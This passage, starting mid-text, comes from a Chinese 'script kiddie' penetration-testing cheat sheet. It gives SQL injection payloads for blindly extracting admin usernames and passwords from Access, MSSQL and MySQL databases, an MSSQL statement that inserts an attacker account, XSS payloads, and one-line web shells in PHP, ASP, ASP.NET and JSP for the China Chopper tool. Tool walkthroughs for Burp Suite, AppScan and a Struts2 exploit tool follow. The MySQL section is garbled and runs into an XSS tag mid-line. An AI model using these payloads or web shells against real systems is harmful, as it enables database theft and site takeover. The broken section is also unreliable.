and exists (select * from [admin])

and (Select Count(*) from Admin)>0

猜解字段:(字段username存在則正常,不正常則不存在)

and (Select username from Admin)>0

and exists (select username from [admin])

猜解用戶名和密碼長(zhǎng)度

and (select top 1 len(username) from Admin)>0

and (select top 1 len(password) from Admin)>0

原 理:如果top 1的username長(zhǎng)度大于0,則條件成立;接著就是>1、>2、>3這樣測(cè)試下去,一直到條件不成立為止,比如>4成立,>5不成立,就是len(username)=5,即用戶名長(zhǎng)度為5.得到username的長(zhǎng)度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII碼.

猜解用戶

and (select top 1 asc(mid(username,1,1)) from Admin)>0,1,2…,

當(dāng)輸入到109時(shí),顯示錯(cuò)誤,而108之前顯示正確,說(shuō)明第一個(gè)字符的ASCII碼為109.,得到第一個(gè)字符是m。

同理and (select top 1 asc(mid(username,2,1) from Admin)>0,1,2…

到114的時(shí)候不成立,說(shuō)明第二個(gè)字符的ASCII碼值為114,字符為r。

注意的是英文和數(shù)字的ASCII碼在1-128之間...

MSSQL注入:

having 1=1-- 【爆出一個(gè)表名及字段,如:列 'users.ID' 在選擇列表中無(wú)效】

group by users.ID having 1=1--

group by users.ID, users.username, users.password, users.privs having 1=1--

; insert into users values( 666, attacker, foobar, 0xffff )-- 【插入新記錄】

猜解表名:

SQL SERVER的每一個(gè)數(shù)據(jù)庫(kù)都會(huì)有用戶表和系統(tǒng)表,在系統(tǒng)表sysobjects中,數(shù)據(jù)庫(kù)內(nèi)創(chuàng)建的每個(gè)對(duì)象(約束、默認(rèn)值、日志、規(guī)則、存儲(chǔ)過(guò)程等)在sysobjects表中占一行,那么也就是說(shuō)當(dāng)前數(shù)據(jù)庫(kù)的表名都會(huì)在該表內(nèi)有存在。我們常用到的參數(shù)有三個(gè),name (數(shù)據(jù)表的名字),xtype( 數(shù)據(jù)表的類型 u為用戶表),id( 數(shù)據(jù)表的對(duì)象標(biāo)志)。

and (select top 1 name from sysobjects where xtype='u')>0 (得到第一個(gè)表名:比如user)

and (select top 1 name from sysobjects where xtype='u' and name not in ('user'))>0 得到第二個(gè)表名,后面的以此類推。。

猜解列名:

用 到系統(tǒng)自帶的2個(gè)函數(shù)col_name()和object_id(),col_name()的格式是“COL_NAME( table_id , column_id )”,參數(shù)table_id是表的標(biāo)識(shí)號(hào),column_id是列的標(biāo)識(shí)號(hào),object_id(admin)就是得到admin在sysobjects 中的標(biāo)識(shí)號(hào),column_id=1,2,3表明admin的第1,2,3列。

and (select top 1 col_name(object_id('admin'),1) from sysobjects)>0 【得到admin字段的第一個(gè)列名“username”依次類推,得到“password”“id”等等】

猜解字段內(nèi)容:

and (select top 1 username from [admin])>0 【直接得到用戶名】

and (select top 1 password from [admin])>0 【直接得到密碼】

UNION聯(lián)合查詢:

select name,password,id from user union select user,pwd,uid from 表名

and 1=1 union select 1,2,3,4,5... from 表名 (數(shù)值從1開(kāi)始慢慢加,如果加到5返回正常,那就存在5個(gè)字段)

ASCII逐字解碼法:

1、猜解列長(zhǎng)度

and (select top 1 len(列名)from 表名)>N

其中N是數(shù)字,變換這個(gè)N的值猜解列長(zhǎng)度,當(dāng)N為6正確,為7錯(cuò)誤,則長(zhǎng)度為7

猜解第二條記錄就該使用:select top 1 len(列名) from 表名 where 列名 not in (select top 1 列名 from 表名)

2、猜解用戶和密碼

ASC()函數(shù)和Mid函數(shù),ASC(mid(列名,N,1))得到“列名”第N位字符ASCII碼

猜解語(yǔ)句為:and (select top 1 asc(mid(字段,1,1)) from 數(shù)據(jù)庫(kù)名)>ASCII碼

區(qū)間判斷語(yǔ)句:....between......and......

中文處理法:當(dāng)ASCII轉(zhuǎn)換后為“負(fù)數(shù)”使用abs()函數(shù)取絕對(duì)值。

例:and (select top 1 abs(asc(mid(字段,1,1))) from 數(shù)據(jù)庫(kù)名)=ASC碼

ASCII逐字解碼法的應(yīng)用:

1、猜解表名:and (select count(*) from admin)<>0

2、猜解列名:and (select count(列名) from 表名)<>0

3、猜解用戶個(gè)數(shù):and (select count(*) from 表名)>1,2.. 2正常,3錯(cuò)誤,表中有3條記錄。

4、猜解用戶名的長(zhǎng)度:and (select len(列名) from 表名)>=1、>=2、>=3、>=4。

5、猜解用戶名:and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0

最后提交:and (select asc(mid(列名,1,1)) from 表名)=ascii的值

6、猜解管理員的密碼:

按照上面的原理,把上面的語(yǔ)句中(asc(mid(列名,1,1)的列名換成PASSWORD就能得到密碼了。

MYSQL+PHP注入:

1.判斷是否存在注入,加';and 1=1 ;and 1=2

2.判斷版本 and ord(mid(version(),1,1))>51 代替。

5.判斷數(shù)據(jù)庫(kù)連接帳號(hào)有沒(méi)有寫權(quán)限,and (select count(*) from mysql.user)>0 οnerrοr=alert(/xss/) width=150></img> ( 表示注釋)

<img src=vbscript:msgbox ("xss")></img>

<style> input {left:expression_r (alert('xss'))}</style>

<div style={left:expression_r (alert('xss'))}></div>

<div style={left:expression_r (alert('xss'))}></div>

<div style={left:\0065\0078ression (alert('xss'))}></div>

html 實(shí)體 <div style={left:&#x0065;xpression (alert('xss'))}></div>

unicode <div style="{left:expression_r (alert('xss'))}">[/post]

參考地址:純手工注入語(yǔ)句~_一葉扁舟_新浪博客

五.Web掃描測(cè)試工具

1.各大平臺(tái)

2.Burpsuite

Burp Suite 是用于攻擊 web 應(yīng)用程序的集成平臺(tái)。它包含了許多工具,并為這些工具設(shè)計(jì)了許多接口,以促進(jìn)加快攻擊應(yīng)用程序的過(guò)程。所有的工具都共享一個(gè)能處理并顯示HTTP 消息,持久性,認(rèn)證,代理,日志,警報(bào)的一個(gè)強(qiáng)大的可擴(kuò)展的框架。
Burp Suite 能高效率地與單個(gè)工具一起工作,例如:一個(gè)中心站點(diǎn)地圖是用于匯總收集到的目標(biāo)應(yīng)用程序信息,并通過(guò)確定的范圍來(lái)指導(dǎo)單個(gè)程序工作。在一個(gè)工具處理 HTTP 請(qǐng)求和響應(yīng)時(shí),它可以選擇調(diào)用其他任意的 Burp 工具。例如,代理記錄的請(qǐng)求可被 Intruder 用來(lái)構(gòu)造一個(gè)自定義的自動(dòng)攻擊的準(zhǔn)則,也可被 Repeater 用來(lái)
手動(dòng)攻擊,也可被 Scanner 用來(lái)分析漏洞,或者被 Spider(網(wǎng)絡(luò)爬蟲(chóng))用來(lái)自動(dòng)搜索內(nèi)容。應(yīng)用程序可以是“被動(dòng)地”運(yùn)行,而不是產(chǎn)生大量的自動(dòng)請(qǐng)求。 Burp Proxy 把所有通過(guò)的請(qǐng)求和響應(yīng)解析為連接和形式,同時(shí)站點(diǎn)地圖也相應(yīng)地更新。由于完全的控制了每一個(gè)請(qǐng)
求,你就可以以一種非入侵的方式來(lái)探測(cè)敏感的應(yīng)用程序。當(dāng)你瀏覽網(wǎng)頁(yè)(這取決于定義的目標(biāo)范圍)時(shí),通過(guò)自動(dòng)掃描經(jīng)過(guò)代理的請(qǐng)求就能發(fā)現(xiàn)安全漏洞。
IburpExtender 是用來(lái)擴(kuò)展 Burp Suite 和單個(gè)工具的功能。一個(gè)工具處理的數(shù)據(jù)結(jié)果,可以被其他工具隨意的使用,并產(chǎn)生相應(yīng)的結(jié)果。

Burp Suite 工具箱
Proxy——是一個(gè)攔截 HTTP /S 的代理服務(wù)器,作為一個(gè)在瀏覽器和目標(biāo)應(yīng)用程序之間的中間人,允許你攔截,查看,修改在兩個(gè)方向上的原始數(shù)據(jù)流。
Spider——是一個(gè)應(yīng)用智能感應(yīng)的網(wǎng)絡(luò)爬蟲(chóng),它能完整的枚舉應(yīng)用程序的內(nèi)容和功能。
Scanner[僅限專業(yè)版]——是一個(gè)高級(jí)的工具,執(zhí)行后,它能自動(dòng)地發(fā)現(xiàn) web 應(yīng)用程序的安全漏洞。
Intruder——是一個(gè)定制的高度可配置的工具,對(duì) web 應(yīng)用程序進(jìn)行自動(dòng)化攻擊,如:枚舉標(biāo)識(shí)符,收集有用的數(shù)據(jù),以及使用 fuzzing 技術(shù)探測(cè)常規(guī)漏洞。
Repeater——是一個(gè)靠手動(dòng)操作來(lái)補(bǔ)發(fā)單獨(dú)的 HTTP 請(qǐng)求,并分析應(yīng)用程序響應(yīng)的工具。
Sequencer——是一個(gè)用來(lái)分析那些不可預(yù)知的應(yīng)用程序會(huì)話令牌和重要數(shù)據(jù)項(xiàng)的隨機(jī)性的工具。
Decoder——是一個(gè)進(jìn)行手動(dòng)執(zhí)行或?qū)?yīng)用程序數(shù)據(jù)者智能解碼編碼的工具。

3.IBM appscan

  下面打開(kāi)appscan創(chuàng)建掃描。

選擇常規(guī)掃描,進(jìn)入配置向?qū)А|c(diǎn)擊下一步,進(jìn)入配置

上面這一步是重點(diǎn),起始URL填寫你要掃描的網(wǎng)址。其它服務(wù)器和域:這里把抽取的所有鏈接都添加進(jìn)去。包括后網(wǎng)站的首頁(yè)鏈接。點(diǎn)擊下一步。

這里提供三種方式來(lái)記錄帳號(hào),不多介紹。第一種和第三種最常用。

然后點(diǎn)擊幾個(gè)下一步后出現(xiàn)后面的選項(xiàng),選擇第三個(gè)或第四項(xiàng)完成掃描的配置。

錄制掃描腳本

  完成配置后,下面就要開(kāi)始錄制腳本了呢。

  點(diǎn)擊工具欄上的探索按鈕,appscan會(huì)打開(kāi)自帶瀏覽器,輸入系統(tǒng)用戶名密碼登錄系統(tǒng),對(duì)你要掃描的模塊功能進(jìn)行操作。

上圖為我打開(kāi)的appscan自帶瀏覽器(因?yàn)槲逸斎氲木W(wǎng)址有誤,所以無(wú)法訪問(wèn))。操作完成之后,點(diǎn)擊暫停按鈕,關(guān)閉瀏覽器窗口即可。

  關(guān)閉瀏覽器后,上面的窗口中會(huì)記錄所有你訪問(wèn)的連接,點(diǎn)擊確定。所有的信息就會(huì)記錄下來(lái)了,下面要做的點(diǎn)擊點(diǎn)擊工具欄上的掃描按鈕開(kāi)始掃描。我們一般晚上下班進(jìn)行,第二天早上來(lái)看掃描結(jié)果就可以了。

  本來(lái)到這里就可以結(jié)束了,我再多說(shuō)個(gè)設(shè)置。在手動(dòng)探索的時(shí)候,因?yàn)榇蜷_(kāi)的瀏覽器是appscan自帶的,可能會(huì)存在兼容性問(wèn)題,有些頁(yè)面無(wú)法正常打開(kāi)。那么是否可以用我們電腦上的瀏覽器(IE 、火狐、谷歌)來(lái)進(jìn)行錄制呢了。當(dāng)然是可以的。

菜單欄--工具---選項(xiàng)----高級(jí)

這個(gè)一定要大圖,我們只需要修改openExternalBrowser 選項(xiàng)“值”的參數(shù)就可以了(1=IE、2=firefox、3=chrome)。

4.Acunetix WVS 7使用

六.漏洞利用工具

1.FCK編輯器漏洞綜合利用工具

2.Struts2終極漏洞利用工具

Struts2終極漏洞:遠(yuǎn)程代碼執(zhí)行漏洞,獲取權(quán)限可執(zhí)行任意命令。

詳細(xì)原理介紹參考網(wǎng)址:struts2.0的工作原理?_百度知道

七.上傳工具

中國(guó)菜刀

中國(guó)菜刀以其特色圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式連接的數(shù)據(jù)庫(kù)。最強(qiáng)悍的是軟件服務(wù)端只需要簡(jiǎn)單的一行代碼.這絕對(duì)可以排入叉叉最喜歡的十大軟件排行榜。(Ps:在某些黑闊手中菜刀算得上是居家旅行,殺人越貨的必備神器),究竟中國(guó)菜刀怎么使用?下面是叉叉的一些使用方法和經(jīng)驗(yàn)總結(jié)

客戶端界面:

在服務(wù)端運(yùn)行的代碼如下:
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request(“pass”)%>
ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>

JSP:<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>
(注意: ASP.NET要單獨(dú)一個(gè)文件或此文件也是Jscript語(yǔ)言)

叉叉之前在上傳漏洞演示,利用burpsuite抓包改包上傳最后講到用菜刀連接,看看是怎么實(shí)現(xiàn)的:

在主視圖中右鍵/添加,在彈出的對(duì)話框中輸入服務(wù)端地址,連接的密碼(這個(gè)必須要),選擇正確的腳本類型和語(yǔ)言編碼,保存后即可使用文件管理,虛擬終端,數(shù)據(jù)庫(kù)管理三大塊功能。要是其它都沒(méi)錯(cuò)誤,那么可能就是你把語(yǔ)言編碼選錯(cuò)了.

1. 文件管理:緩存下載目錄,并支持離線查看緩存目錄,上傳下載修改文件

2. 虛擬終端:人性化的設(shè)計(jì),操作方便;(輸入HELP查看更多用法)

3. 數(shù)據(jù)庫(kù)管理:圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式連接的數(shù)據(jù)庫(kù)。
(各種腳本條件下的數(shù)據(jù)庫(kù)連接方法請(qǐng)點(diǎn)擊數(shù)據(jù)庫(kù)管理界面左上角處的配置按鈕查看)

關(guān)于配置信息怎么填?
PHP腳本:
<T>類型</T> 類型可為MYSQL,MSSQL,ORACLE,INFOMIX中的一種
<H>主機(jī)地址<H> 主機(jī)地址可為機(jī)器名或IP地址,如localhost
< U>數(shù)據(jù)庫(kù)用戶</U> 連接數(shù)據(jù)庫(kù)的用戶名,如root
< P>數(shù)據(jù)庫(kù)密碼</P> 連接數(shù)據(jù)庫(kù)的密碼,如123455
ASP和ASP.NET腳本:
<T>類型</T> 類型只能填A(yù)DO
< C>ADO配置信息</C>
ADO連接各種數(shù)據(jù)庫(kù)的方式不一樣。如MSSQL的配置信息為
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456

叉叉用本機(jī)的mysql來(lái)演示:

4.網(wǎng)站蜘蛛功能:織出一張網(wǎng)站的目錄結(jié)構(gòu)。下載的列表文件存在桌面,右鍵菜單/載入U(xiǎn)RL列表即可以根據(jù)地址得到目錄結(jié)構(gòu)。

5.定時(shí)提醒當(dāng)鬧鐘來(lái)使吧, 周期:每月/每周/每日/只一次。
6.快速啟動(dòng)
一些常用的快捷方式放在這里,可以指定用戶身份運(yùn)行程序。這部分?jǐn)?shù)據(jù)是以加密存儲(chǔ)的。
7.
瀏覽器
地址欄輸入HELP

8.自定義服務(wù)端代碼

參考地址:強(qiáng)大的Web管理軟件,中國(guó)菜刀(chopper)的使用方法和教程 - 軟件工具 - 紅黑聯(lián)盟

八.后臺(tái)、目錄掃描工具

御劍1.5

打開(kāi)工具,添加URL

雙擊添加目錄、后臺(tái)字典文件,設(shè)置線程,HTTP響應(yīng)回顯信息

總結(jié)

以上是生活随笔為你收集整理的渗透测试基础总结(脚本小子)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。